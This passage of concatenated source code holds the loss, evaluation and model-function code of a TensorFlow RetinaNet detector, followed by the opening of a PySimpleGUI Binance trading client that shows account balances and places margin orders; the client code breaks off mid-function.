                              (1.0 - alpha) * per_entry_loss)
    return tf.reduce_sum(alpha_weighted) / normalizer
def _classification_loss(cls_outputs,
                         cls_targets,
                         num_positives,
                         alpha=0.25,
                         gamma=2.0):
  """Computes the focal classification loss, normalized by `num_positives`."""
  return focal_loss(cls_outputs, cls_targets, alpha, gamma, num_positives)
def _box_loss(box_outputs, box_targets, num_positives, delta=0.1):
  """Computes Huber box-regression loss, normalized by 4 * num_positives."""
  # delta is typically around the mean value of the regression target.
  # For instance, the regression targets of a 512x512 input with 6 anchors on
  # the P3-P7 pyramid are about [0.1, 0.1, 0.2, 0.2].
  # Entries whose target is exactly 0.0 get zero weight (presumably padding /
  # background positions).
  valid_mask = tf.not_equal(box_targets, 0.0)
  raw_loss = tf.losses.huber_loss(
      box_targets,
      box_outputs,
      weights=valid_mask,
      delta=delta,
      reduction=tf.losses.Reduction.SUM)
  # Each positive contributes 4 box coordinates, hence the factor of 4.
  return raw_loss / (num_positives * 4.0)
def detection_loss(cls_outputs, box_outputs, labels, params):
  """Computes total detection loss.

  Computes total detection loss including box and class loss from all levels.

  Args:
    cls_outputs: an OrderDict with keys representing levels and values
      representing logits in [batch_size, height, width, num_anchors].
    box_outputs: an OrderDict with keys representing levels and values
      representing box regression targets in [batch_size, height, width,
      num_anchors * 4].
    labels: the dictionary returned from the dataloader that includes
      groundtruth targets.
    params: the dictionary including training parameters specified in
      the default_hparams function in this file.

  Returns:
    total_loss: a tensor representing total loss reduced from
      class and box losses from all levels.
    cls_loss: a tensor representing total class loss.
    box_loss: a tensor representing total box regression loss.
  """
  # Sum all positives in a batch for normalization and avoid zero
  # num_positives_sum, which would lead to inf loss during training.
  num_positives_sum = tf.reduce_sum(labels['mean_num_positives']) + 1.0
  levels = cls_outputs.keys()
  cls_losses = []
  box_losses = []
  for level in levels:
    # Onehot encoding for classification labels.
    cls_targets_at_level = tf.one_hot(labels['cls_targets_%d' % level],
                                      params['num_classes'])
    # Fold the one-hot class dimension into the anchor dimension so the
    # targets match the [bs, h, w, anchors * num_classes] layout of
    # cls_outputs at this level.
    bs, width, height, _, _ = cls_targets_at_level.get_shape().as_list()
    cls_targets_at_level = tf.reshape(cls_targets_at_level,
                                      [bs, width, height, -1])
    box_targets_at_level = labels['box_targets_%d' % level]
    cls_losses.append(
        _classification_loss(
            cls_outputs[level],
            cls_targets_at_level,
            num_positives_sum,
            alpha=params['alpha'],
            gamma=params['gamma']))
    box_losses.append(
        _box_loss(
            box_outputs[level],
            box_targets_at_level,
            num_positives_sum,
            delta=params['delta']))
  # Sum per level losses to total loss.
  cls_loss = tf.add_n(cls_losses)
  box_loss = tf.add_n(box_losses)
  total_loss = cls_loss + params['box_loss_weight'] * box_loss
  return total_loss, cls_loss, box_loss
def add_metric_fn_inputs(params, cls_outputs, box_outputs, metric_fn_inputs):
  """Selects top-k predictions and adds the selected to metric_fn_inputs.

  Args:
    params: a parameter dictionary that includes `min_level`, `max_level`,
      `batch_size`, and `num_classes`.
    cls_outputs: an OrderDict with keys representing levels and values
      representing logits in [batch_size, height, width, num_anchors].
    box_outputs: an OrderDict with keys representing levels and values
      representing box regression targets in [batch_size, height, width,
      num_anchors * 4].
    metric_fn_inputs: a dictionary that will hold the top-k selections
      (mutated in place; keys 'cls_outputs_all', 'box_outputs_all',
      'indices_all', 'classes_all' are added).
  """
  cls_outputs_all = []
  box_outputs_all = []
  batch_size = tf.shape(cls_outputs[params['min_level']])[0]
  # Concatenates class and box of all levels into one tensor.
  for level in range(params['min_level'], params['max_level'] + 1):
    cls_outputs_all.append(
        tf.reshape(cls_outputs[level], [batch_size, -1, params['num_classes']]))
    box_outputs_all.append(tf.reshape(box_outputs[level], [batch_size, -1, 4]))
  cls_outputs_all = tf.concat(cls_outputs_all, 1)
  box_outputs_all = tf.concat(box_outputs_all, 1)
  # cls_outputs_all has a shape of [batch_size, N, num_classes] and
  # box_outputs_all has a shape of [batch_size, N, 4]. The batch_size here
  # is per-shard batch size. Recently, top-k on TPU supports batch
  # dimension (b/67110441), but the following function performs top-k on
  # each sample.
  cls_outputs_all_after_topk = []
  box_outputs_all_after_topk = []
  indices_all = []
  classes_all = []

  def _compute_top_k(x):
    """Compute top-k values for each row in a batch."""
    cls_outputs_per_sample, box_outputs_per_sample = x
    # Flatten (anchor, class) so a single top_k ranks all class scores.
    cls_outputs_per_sample_reshape = tf.reshape(cls_outputs_per_sample, [-1])
    _, cls_topk_indices = tf.nn.top_k(cls_outputs_per_sample_reshape,
                                      k=anchors.MAX_DETECTION_POINTS)
    # Gets top-k class and box scores: recover the anchor index (div) and
    # the class index (mod) from each flat index.
    indices = tf.div(cls_topk_indices, params['num_classes'])
    classes = tf.mod(cls_topk_indices, params['num_classes'])
    cls_indices = tf.stack([indices, classes], axis=1)
    cls_outputs_after_topk = tf.gather_nd(cls_outputs_per_sample, cls_indices)
    box_outputs_after_topk = tf.gather_nd(box_outputs_per_sample,
                                          tf.expand_dims(indices, 1))
    return [indices, classes, cls_outputs_after_topk, box_outputs_after_topk]

  # Apply the per-sample top-k across the batch dimension; gradients are not
  # needed for metrics, hence back_prop=False.
  (indices_all, classes_all, cls_outputs_all_after_topk,
   box_outputs_all_after_topk) = tf.map_fn(
       _compute_top_k, [cls_outputs_all, box_outputs_all],
       back_prop=False,
       dtype=[tf.int32, tf.int32, tf.float32, tf.float32])
  # Concatenates via the batch dimension.
  metric_fn_inputs['cls_outputs_all'] = cls_outputs_all_after_topk
  metric_fn_inputs['box_outputs_all'] = box_outputs_all_after_topk
  metric_fn_inputs['indices_all'] = indices_all
  metric_fn_inputs['classes_all'] = classes_all
def coco_metric_fn(batch_size, anchor_labeler, filename=None, **kwargs):
  """Evaluation metric fn. Performed on CPU, do not reference TPU ops.

  Args:
    batch_size: python int, number of samples to post-process.
    anchor_labeler: anchors.AnchorLabeler used to turn per-sample outputs
      into detections.
    filename: optional value forwarded to coco_metric.EvaluationMetric
      (presumably a COCO annotation JSON path — confirm in coco_metric).
    **kwargs: tensors produced by add_metric_fn_inputs ('cls_outputs_all',
      'box_outputs_all', 'indices_all', 'classes_all') plus 'source_ids',
      'image_scales' and 'groundtruth_data'.

  Returns:
    The metrics dict produced by EvaluationMetric.estimator_metric_fn.
  """
  # add metrics to output
  detections_bs = []
  for index in range(batch_size):
    # Slice out this sample's top-k selections and generate its detections.
    cls_outputs_per_sample = kwargs['cls_outputs_all'][index]
    box_outputs_per_sample = kwargs['box_outputs_all'][index]
    indices_per_sample = kwargs['indices_all'][index]
    classes_per_sample = kwargs['classes_all'][index]
    detections = anchor_labeler.generate_detections(
        cls_outputs_per_sample, box_outputs_per_sample, indices_per_sample,
        classes_per_sample, tf.slice(kwargs['source_ids'], [index], [1]),
        tf.slice(kwargs['image_scales'], [index], [1]))
    detections_bs.append(detections)
  eval_metric = coco_metric.EvaluationMetric(filename=filename)
  coco_metrics = eval_metric.estimator_metric_fn(detections_bs,
                                                 kwargs['groundtruth_data'])
  return coco_metrics
def _predict_postprocess(cls_outputs, box_outputs, labels, params):
  """Post processes prediction outputs.

  Decodes raw class/box outputs into final detections using the anchor grid
  and postprocess.generate_detections.

  Args:
    cls_outputs: per-level classification outputs (dict keyed by level).
    box_outputs: per-level box regression outputs (dict keyed by level).
    labels: optional dict providing 'image_info', 'source_ids' and
      'groundtruth_data' to pass through for evaluation; may be None.
    params: hyperparameter dict (anchor configuration and num_classes).

  Returns:
    A dict with 'detection_boxes', 'detection_classes', 'detection_scores'
    and 'num_detections', plus groundtruth passthrough fields when labels
    is not None.
  """
  predict_anchors = anchors.Anchors(
      params['min_level'], params['max_level'], params['num_scales'],
      params['aspect_ratios'], params['anchor_scale'], params['image_size'])
  # Flatten per-level outputs and anchor boxes into single tensors.
  cls_outputs, box_outputs, anchor_boxes = postprocess.reshape_outputs(
      cls_outputs, box_outputs, predict_anchors.boxes, params['min_level'],
      params['max_level'], params['num_classes'])
  boxes, scores, classes, num_detections = postprocess.generate_detections(
      cls_outputs, box_outputs, anchor_boxes)
  predictions = {
      'detection_boxes': boxes,
      'detection_classes': classes,
      'detection_scores': scores,
      'num_detections': num_detections,
  }
  if labels is not None:
    # Pass groundtruth through so downstream eval can match detections to it.
    predictions.update({
        'image_info': labels['image_info'],
        'source_id': labels['source_ids'],
        'groundtruth_data': labels['groundtruth_data'],
    })
  return predictions
def _model_fn(features, labels, mode, params, model, use_tpu_estimator_spec,
              variable_filter_fn=None):
  """Model definition for the RetinaNet model based on ResNet.

  Args:
    features: the input image tensor with shape [batch_size, height, width, 3].
      The height and width are fixed and equal.
    labels: the input labels in a dictionary. The labels include class targets
      and box targets which are dense label maps. The labels are generated from
      get_input_fn function in dataloader.py
    mode: the mode of TPUEstimator/Estimator including TRAIN, EVAL, and PREDICT.
    params: the dictionary defines hyperparameters of model. The default
      settings are in default_hparams function in this file.
    model: the RetinaNet model outputs class logits and box regression outputs.
    use_tpu_estimator_spec: Whether to use TPUEstimatorSpec or EstimatorSpec.
    variable_filter_fn: the filter function that takes trainable_variables and
      returns the variable list after applying the filter rule.

  Returns:
    tpu_spec: the TPUEstimatorSpec to run training, evaluation, or prediction.
  """
  # In predict mode features is a dict with input as value of the 'inputs'.
  image_info = None
  if (mode == tf.estimator.ModeKeys.PREDICT
      and isinstance(features, dict) and 'inputs' in features):
    image_info = features['image_info']
    labels = None
    if 'labels' in features:
      labels = features['labels']
    features = features['inputs']

  def _model_outputs():
    # Builds the network; returns per-level (cls_outputs, box_outputs) dicts.
    return model(
        features,
        min_level=params['min_level'],
        max_level=params['max_level'],
        num_classes=params['num_classes'],
        num_anchors=len(params['aspect_ratios'] * params['num_scales']),
        resnet_depth=params['resnet_depth'],
        is_training_bn=params['is_training_bn'])

  if params['use_bfloat16']:
    # Run the network under a bfloat16 scope, then cast outputs back to
    # float32 so the losses below are computed in full precision.
    with contrib_tpu.bfloat16_scope():
      cls_outputs, box_outputs = _model_outputs()
      levels = cls_outputs.keys()
      for level in levels:
        cls_outputs[level] = tf.cast(cls_outputs[level], tf.float32)
        box_outputs[level] = tf.cast(box_outputs[level], tf.float32)
  else:
    cls_outputs, box_outputs = _model_outputs()
    levels = cls_outputs.keys()

  # First check if it is in PREDICT mode.
  if mode == tf.estimator.ModeKeys.PREDICT:
    # Postprocess on host; memory layout for NMS on TPU is very inefficient.
    def _predict_postprocess_wrapper(args):
      return _predict_postprocess(*args)

    predictions = contrib_tpu.outside_compilation(
        _predict_postprocess_wrapper,
        (cls_outputs, box_outputs, labels, params))

    # Include resizing information on prediction output to help bbox drawing.
    if image_info is not None:
      predictions.update({
          'image_info': tf.identity(image_info, 'ImageInfo'),
      })
    return contrib_tpu.TPUEstimatorSpec(
        mode=tf.estimator.ModeKeys.PREDICT, predictions=predictions)

  # Load pretrained model from checkpoint.
  if params['resnet_checkpoint'] and mode == tf.estimator.ModeKeys.TRAIN:

    def scaffold_fn():
      """Loads pretrained model through scaffold function."""
      tf.train.init_from_checkpoint(params['resnet_checkpoint'], {
          '/': 'resnet%s/' % params['resnet_depth'],
      })
      return tf.train.Scaffold()
  else:
    scaffold_fn = None

  # Set up training loss and learning rate.
  update_learning_rate_schedule_parameters(params)
  global_step = tf.train.get_global_step()
  learning_rate = learning_rate_schedule(
      params['adjusted_learning_rate'], params['lr_warmup_init'],
      params['lr_warmup_step'], params['first_lr_drop_step'],
      params['second_lr_drop_step'], global_step)
  # cls_loss and box_loss are for logging. only total_loss is optimized.
  total_loss, cls_loss, box_loss = detection_loss(cls_outputs, box_outputs,
                                                  labels, params)
  # L2 weight decay over trainable variables, excluding batch-norm params.
  total_loss += _WEIGHT_DECAY * tf.add_n([
      tf.nn.l2_loss(v)
      for v in tf.trainable_variables()
      if 'batch_normalization' not in v.name
  ])

  if mode == tf.estimator.ModeKeys.TRAIN:
    optimizer = tf.train.MomentumOptimizer(
        learning_rate, momentum=params['momentum'])
    if params['use_tpu']:
      optimizer = contrib_tpu.CrossShardOptimizer(optimizer)
    else:
      if params['auto_mixed_precision']:
        optimizer = tf.train.experimental.enable_mixed_precision_graph_rewrite(
            optimizer)
    # Batch norm requires `update_ops` to be executed alongside `train_op`.
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    var_list = variable_filter_fn(
        tf.trainable_variables(),
        params['resnet_depth']) if variable_filter_fn else None
    minimize_op = optimizer.minimize(total_loss, global_step, var_list=var_list)
    train_op = tf.group(minimize_op, update_ops)
  else:
    train_op = None

  eval_metrics = None
  if mode == tf.estimator.ModeKeys.EVAL:

    def metric_fn(**kwargs):
      """Returns a dictionary that has the evaluation metrics."""
      batch_size = params['batch_size']
      eval_anchors = anchors.Anchors(
          params['min_level'], params['max_level'], params['num_scales'],
          params['aspect_ratios'], params['anchor_scale'], params['image_size'])
      anchor_labeler = anchors.AnchorLabeler(eval_anchors,
                                             params['num_classes'])
      cls_loss = tf.metrics.mean(kwargs['cls_loss_repeat'])
      box_loss = tf.metrics.mean(kwargs['box_loss_repeat'])
      coco_metrics = coco_metric_fn(batch_size, anchor_labeler,
                                    params['val_json_file'], **kwargs)
      # Add metrics to output.
      output_metrics = {
          'cls_loss': cls_loss,
          'box_loss': box_loss,
      }
      output_metrics.update(coco_metrics)
      return output_metrics

    # The scalar losses are tiled to [batch_size, 1], presumably because
    # metric_fn inputs must carry the batch dimension — confirm against
    # TPUEstimator's eval_metrics contract.
    cls_loss_repeat = tf.reshape(
        tf.tile(tf.expand_dims(cls_loss, 0), [
            params['batch_size'],
        ]), [params['batch_size'], 1])
    box_loss_repeat = tf.reshape(
        tf.tile(tf.expand_dims(box_loss, 0), [
            params['batch_size'],
        ]), [params['batch_size'], 1])
    metric_fn_inputs = {
        'cls_loss_repeat': cls_loss_repeat,
        'box_loss_repeat': box_loss_repeat,
        'source_ids': labels['source_ids'],
        'groundtruth_data': labels['groundtruth_data'],
        'image_scales': labels['image_scales'],
    }
    add_metric_fn_inputs(params, cls_outputs, box_outputs, metric_fn_inputs)
    eval_metrics = (metric_fn, metric_fn_inputs)

  if use_tpu_estimator_spec:
    return contrib_tpu.TPUEstimatorSpec(
        mode=mode,
        loss=total_loss,
        train_op=train_op,
        eval_metrics=eval_metrics,
        scaffold_fn=scaffold_fn)
  else:
    return tf.estimator.EstimatorSpec(
        mode=mode,
        loss=total_loss,
        # TODO(rostam): Fix bug to get scaffold working.
        # scaffold=scaffold_fn(),
        train_op=train_op)
def tpu_retinanet_model_fn(features, labels, mode, params):
  """RetinaNet `model_fn` for TPUEstimator (returns a TPUEstimatorSpec)."""
  return _model_fn(features, labels, mode, params,
                   model=retinanet_architecture.retinanet,
                   use_tpu_estimator_spec=True,
                   variable_filter_fn=retinanet_architecture.remove_variables)
def est_retinanet_model_fn(features, labels, mode, params):
  """RetinaNet `model_fn` for the plain Estimator (returns an EstimatorSpec)."""
  return _model_fn(features, labels, mode, params,
                   model=retinanet_architecture.retinanet,
                   use_tpu_estimator_spec=False,
                   variable_filter_fn=retinanet_architecture.remove_variables)
def default_hparams():
  """Returns the default model/training hyperparameters as an HParams object."""
  return contrib_training.HParams(
      # input preprocessing parameters
      image_size=640,
      input_rand_hflip=True,
      train_scale_min=1.0,
      train_scale_max=1.0,
      # dataset specific parameters
      num_classes=90,
      skip_crowd_during_training=True,
      # model architecture
      min_level=3,
      max_level=7,
      num_scales=3,
      aspect_ratios=[(1.0, 1.0), (1.4, 0.7), (0.7, 1.4)],
      anchor_scale=4.0,
      resnet_depth=50,
      # is batchnorm training mode
      is_training_bn=True,
      # Placeholder of number of epochs, default is 2x schedule.
      # Reference:
      # https://github.com/facebookresearch/Detectron/blob/master/MODEL_ZOO.md#training-schedules
      num_epochs=24,
      # optimization
      momentum=0.9,
      learning_rate=0.08,
      lr_warmup_init=0.008,
      lr_warmup_epoch=1.0,
      first_lr_drop_epoch=8.0,
      second_lr_drop_epoch=11.0,
      # classification loss
      alpha=0.25,
      gamma=1.5,
      # localization loss
      delta=0.1,
      box_loss_weight=50.0,
      # enable bfloat
      use_bfloat16=True,
      # NOTE(review): _model_fn also reads keys such as 'use_tpu',
      # 'resnet_checkpoint', 'auto_mixed_precision', 'num_shards' and
      # 'num_examples_per_epoch' that are not defaulted here — presumably
      # supplied by the caller; confirm.
  )
|
<filename>BinanceGUI.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# <NAME> (https://sites.google.com/view/a2gs/)
from os import getenv
from sys import exit, argv
from textwrap import fill
import configparser
import PySimpleGUI as sg
from binance.client import Client
from binance.exceptions import BinanceAPIException, BinanceWithdrawException, BinanceRequestException
import binanceOrder as BO
import binanceUtil as BU
#from gui.orderListButton import getOrderList, orderListFixed
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
class cfg_c:
    """Thin wrapper around configparser with built-in fallback defaults.

    Reads `cfgFileName` (INI format) and serves values from section
    `cfgHead`, falling back to hard-coded defaults for known keys and
    None for unknown ones.
    """

    # Class-level placeholders; real values are set per-instance in __init__.
    cfgFile = 0
    cfgHeader = ''
    cfg = 0

    # Fallback values returned when a key is absent from the config file.
    _DEFAULTS = {
        'BINANCE_APIKEY': '',
        'BINANCE_SEKKEY': '',
        'BINANCE_RECVWINDOW': '5000',
        'COPYTRADE': 'NO',
        'THEME': 'Dark Blue 3',
    }

    def __init__(self, cfgFileName : str = "BinanceGUI.cfg", cfgHead : str = "DEFAULT"):
        self.cfg = configparser.ConfigParser()
        self.cfgFile = cfgFileName
        self.cfgHeader = cfgHead

    def load(self) -> [bool, str]:
        """Reads the config file. Returns (True, "Ok") or (False, exception).

        Note: configparser.read() silently ignores a missing file, so a
        nonexistent config still yields (True, "Ok") with defaults in effect.
        """
        try:
            self.cfg.read(self.cfgFile)
        except Exception as e:
            return False, e
        return True, "Ok"

    def get(self, k : str = ''):
        """Returns the configured value for `k`, a known default, or None."""
        try:
            return self.cfg[self.cfgHeader][k]
        except KeyError:
            # Missing section or key: fall back to the defaults table.
            # Bug fix: the original returned the undefined name NONE for
            # unknown keys, raising NameError at runtime; return None instead.
            return self._DEFAULTS.get(k)
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# Module-level configuration singleton; read by COPYTRADE_IsEnable() below.
cfgbnb = cfg_c()
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
def printAccountInfo(client) -> [bool, str]:
    """Fetches spot and margin account info and shows it in a popup window.

    Args:
        client: authenticated binance.client.Client instance.

    Returns:
        [False, error message] if any API call fails, otherwise [True, "Ok"].
    """

    def printAccount(accBalance) -> str:
        # One-line summary of a spot asset balance entry.
        return f"Asset balance [{accBalance['asset']}] | Free [{accBalance['free']}] | Locked [{accBalance['locked']}]"

    def printMarginAssets(asset, seq = 0) -> str:
        # Multi-line summary of one margin asset, numbered by `seq`.
        return f"{seq}) Asset: [{asset['asset']}]\n\tBorrowed.: [{asset['borrowed']}]\n\tFree.....: [{asset['free']}]\n\tLocked...: [{asset['locked']}]\n\tNet asset: [{asset['netAsset']}]\n"

    try:
        acc = client.get_account() #recvWindow = BU.getRecvWindow())
    except BinanceAPIException as e:
        return False, f"Erro at client.get_account() BinanceAPIException: [{e.status_code} - {e.message}]"
    except BinanceRequestException as e:
        # NOTE(review): BinanceRequestException may not expose status_code /
        # message like BinanceAPIException does — confirm before relying on
        # this formatting.
        return False, f"Erro at client.get_account() BinanceRequestException: [{e.status_code} - {e.message}]"
    except Exception as e:
        return False, f"Erro at client.get_account(): {e}"

    try:
        accStatus = client.get_account_status() # recvWindow = BU.getRecvWindow())
    except BinanceWithdrawException as e:
        return False, f"Erro at client.get_account_status() BinanceWithdrawException: [{e.status_code} - {e.message}]"
    except Exception as e:
        return False, f"Erro at client.get_account_status(): {e}"

    # Build one big report string shown in a read-only multiline widget.
    totalinfos = f"Can trade............? [{acc['canTrade']}]\n"
    totalinfos += f"Can withdraw.........? [{acc['canWithdraw']}]\n"
    totalinfos += f"Can deposit..........? [{acc['canDeposit']}]\n"
    totalinfos += f"Account type.........: [{acc['accountType']}]\n"
    totalinfos += f"Account status detail: [{accStatus['msg']}] Success: [{accStatus['success']}]\n"
    totalinfos += f"Commissions..........: Maker: [{acc['makerCommission']}] | Taker: [{acc['takerCommission']}] | Buyer: [{acc['buyerCommission']}] | Seller: [{acc['sellerCommission']}]\n\n"
    totalinfos += "Balances:\n"
    # Only balances with non-zero free or locked amounts are listed.
    if len(acc['balances']) != 0:
        totalinfos += '\n'.join([printAccount(n) for n in acc['balances'] if float(n['free']) != 0.0 or float(n['locked']) != 0.0]) + '\n\n'
    else:
        totalinfos += 'Zero.\n\n'

    totalinfos += "Margin accoutn information:\n"
    try:
        marginInfo = client.get_margin_account() #recvWindow = BU.getRecvWindow())
    except BinanceRequestException as e:
        return False, f"Erro at client.get_margin_account() BinanceRequestException: [{e.status_code} - {e.message}]"
    except BinanceAPIException as e:
        return False, f"Erro at client.get_margin_account() BinanceAPIException: [{e.status_code} - {e.message}]"
    except Exception as e:
        return False, f"Erro at client.get_margin_account(): {e}"

    # Margin assets with a non-zero net position, numbered from 1 below.
    cleanedMarginAssets = [n for n in marginInfo['userAssets'] if float(n['netAsset']) != 0.0]
    totalinfos += f"Borrow Enabled........? [{marginInfo['borrowEnabled']}]\n"
    totalinfos += f"Trade enabled.........? [{marginInfo['tradeEnabled']}]\n"
    totalinfos += f"Level.................: [{marginInfo['marginLevel']}]\n"
    totalinfos += f"Total asset of BTC....: [{marginInfo['totalAssetOfBtc']}]\n"
    totalinfos += f"Total liability of BTC: [{marginInfo['totalLiabilityOfBtc']}]\n"
    totalinfos += f"Total Net asset of BTC: [{marginInfo['totalNetAssetOfBtc']}]\n\n"
    totalinfos += 'Borrowed assets:\n'
    totalinfos += '\n'.join ([printMarginAssets(n, i) for i, n in enumerate(cleanedMarginAssets, 1)])

    # Show the report in a blocking window; closes on 'Ok' or window close.
    layoutAccInfo = [[sg.Multiline(totalinfos, key='-INFOMLINE-' + sg.WRITE_ONLY_KEY, size=(100,25), font='Courier 10', disabled=True)], [sg.Button('Ok')]]
    windowInfoAcc = sg.Window("Acc Infos", layoutAccInfo).Finalize()
    eventInfoAcc, valuesInfoAcc = windowInfoAcc.read()
    windowInfoAcc.close()

    del totalinfos
    del acc
    del accStatus
    del marginInfo
    del cleanedMarginAssets
    del windowInfoAcc
    del layoutAccInfo

    return True, "Ok"
def COPYTRADE_IsEnable() -> bool:
    """True when the config enables copy-trade (COPYTRADE == 'YES')."""
    # Reading the module-level cfgbnb needs no `global` declaration.
    return cfgbnb.get('COPYTRADE') == 'YES'
def BS_MarginStopLimit(client, bgcolor = '', windowTitle = '', clientSide = 0) -> [bool, str]:
    """Window loop to place margin stop-limit orders until the user closes it.

    Args:
        client: authenticated binance Client, forwarded to BO.orderMargin().
        bgcolor: background color for the PySimpleGUI widgets and window.
        windowTitle: window title, also used as prefix in log messages.
        clientSide: order side, forwarded as sideOrd to BO.orderMargin().

    Returns:
        [False, message] when an order submission fails (window is closed),
        [True, "Ok"] when the user cancels or closes the window.
    """
    layoutMSL = [
        [sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
        [sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
        [sg.Text('Stop Price: ', background_color = bgcolor), sg.InputText(key = '-STOP PRICE-')],
        [sg.Text('Limit Price: ', background_color = bgcolor), sg.InputText(key = '-LIMIT PRICE-')],
        [sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
        [sg.Button('SEND!'), sg.Button('CANCEL')],
    ]
    windowMSL = sg.Window(windowTitle, layoutMSL, background_color = bgcolor).Finalize()
    # The window stays open so several orders can be sent in sequence.
    while True:
        eventMSL, valuesMSL = windowMSL.read()
        if eventMSL == 'SEND!':
            BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesMSL['-SYMBOL-']}] Qtd: [{valuesMSL['-QTD-']}] Stop Prc: [{valuesMSL['-STOP PRICE-']}] Limit Prc: [{valuesMSL['-LIMIT PRICE-']}]")
            # Ask for confirmation; 'No' aborts this order only.
            if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
                BU.errPrint(f'{windowTitle} - CANCELLED!')
                continue
            # NOTE(review): prcOrd receives the STOP price and prcStop the
            # LIMIT price, and typeOrd is TAKE_PROFIT_LIMIT although the
            # window is labeled "stop limit" — verify against the
            # BO.orderMargin signature; the arguments may be swapped.
            ret, retMsg = BO.orderMargin(client,
                                         symbOrd = valuesMSL['-SYMBOL-'],
                                         qtdOrd = valuesMSL['-QTD-'],
                                         prcOrd = valuesMSL['-STOP PRICE-'],
                                         prcStop = valuesMSL['-LIMIT PRICE-'],
                                         sideOrd = clientSide,
                                         typeOrd = "TAKE_PROFIT_LIMIT",
                                         limit = 0.0 )
            if ret == False:
                sg.popup('ERRO! Order didnt post!')
                windowMSL.close()
                del windowMSL
                del layoutMSL
                return False, f"Erro posting order {retMsg}!"
            if valuesMSL['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
                BU.errPrint(f"COPYTRADE: [MARGINSTOPLIMIT | TAKE_PROFIT_LIMIT | {valuesMSL['-SYMBOL-']} | {valuesMSL['-QTD-']} | {valuesMSL['-STOP PRICE-']} | {valuesMSL['-LIMIT PRICE-']} | {clientSide}]")
            BU.errPrint(f'{windowTitle} - CONFIRMED!')
        elif eventMSL == sg.WIN_CLOSED or eventMSL == 'CANCEL':
            BU.errPrint(f'{windowTitle} - CANCELLED!')
            break
    windowMSL.close()
    del windowMSL
    del layoutMSL
    return True, "Ok"
def BS_MarginMarket(client, bgcolor = '', windowTitle = '', clientSide = 0) -> [bool, str]:
    """Window loop to place margin market orders until the user closes it.

    Args:
        client: authenticated binance Client, forwarded to BO.orderMargin().
        bgcolor: background color for the PySimpleGUI widgets and window.
        windowTitle: window title, also used as prefix in log messages.
        clientSide: order side, forwarded as sideOrd to BO.orderMargin().

    Returns:
        [False, message] when an order submission fails (window is closed),
        [True, "Ok"] when the user cancels or closes the window.
        (Annotation corrected from `bool` to match the actual returns and
        the sibling BS_* functions.)
    """
    layoutMM = [
        [sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
        [sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
        [sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
        [sg.Button('SEND!'), sg.Button('CANCEL')],
    ]
    windowMM = sg.Window(windowTitle, layoutMM, background_color = bgcolor).Finalize()
    # The window stays open so several orders can be sent in sequence.
    while True:
        eventMM, valuesMM = windowMM.read()
        if eventMM == 'SEND!':
            BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesMM['-SYMBOL-']}] Qtd: [{valuesMM['-QTD-']}]")
            # Ask for confirmation; 'No' aborts this order only.
            if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
                BU.errPrint(f'{windowTitle} - CANCELLED!')
                continue
            ret, msgRet = BO.orderMargin(client,
                                         symbOrd = valuesMM['-SYMBOL-'],
                                         qtdOrd = valuesMM['-QTD-'],
                                         sideOrd = clientSide,
                                         typeOrd = Client.ORDER_TYPE_MARKET)
            if ret == False:
                sg.popup('ERRO! Order didnt post!')
                windowMM.close()
                del windowMM
                del layoutMM
                return False, f"Erro placing order! {msgRet}"
            if valuesMM['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
                # TODO: copy-trade forwarding not implemented here yet.
                print("Call COPYTRADE...")
            BU.errPrint(f'{windowTitle} - CONFIRMED!')
        elif eventMM == sg.WIN_CLOSED or eventMM == 'CANCEL':
            BU.errPrint(f'{windowTitle} - CANCELLED!')
            break
    windowMM.close()
    del windowMM
    del layoutMM
    return True, "Ok"
def BS_MarginLimit(client, bgcolor = '', windowTitle = '', clientSide = 0) -> [bool, str]:
    """Window loop to place margin limit orders until the user closes it.

    Args:
        client: authenticated binance Client, forwarded to BO.orderMargin().
        bgcolor: background color for the PySimpleGUI widgets and window.
        windowTitle: window title, also used as prefix in log messages.
        clientSide: order side, forwarded as sideOrd to BO.orderMargin().

    Returns:
        [False, message] when an order submission fails (window is closed),
        [True, "Ok"] when the user cancels or closes the window.
    """
    layoutML = [
        [sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
        [sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
        [sg.Text('Price: ', background_color = bgcolor), sg.InputText(key = '-PRICE-')],
        [sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
        [sg.Button('SEND!'), sg.Button('CANCEL')],
    ]
    windowML = sg.Window(windowTitle, layoutML, background_color = bgcolor).Finalize()
    # The window stays open so several orders can be sent in sequence.
    while True:
        eventML, valuesML = windowML.read()
        if eventML == 'SEND!':
            BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesML['-SYMBOL-']}] Qtd: [{valuesML['-QTD-']}] Price: [{valuesML['-PRICE-']}]")
            # Ask for confirmation; 'No' aborts this order only.
            if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
                BU.errPrint(f'{windowTitle} - CANCELLED!')
                continue
            ret, msgRet = BO.orderMargin(client,
                                         symbOrd = valuesML['-SYMBOL-'],
                                         qtdOrd = valuesML['-QTD-'],
                                         prcOrd = valuesML['-PRICE-'],
                                         sideOrd = clientSide,
                                         typeOrd = Client.ORDER_TYPE_LIMIT)
            if ret == False:
                sg.popup('ERRO! Order didnt post!')
                windowML.close()
                del windowML
                del layoutML
                return False, f"Eror posting order! {msgRet}"
            if valuesML['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
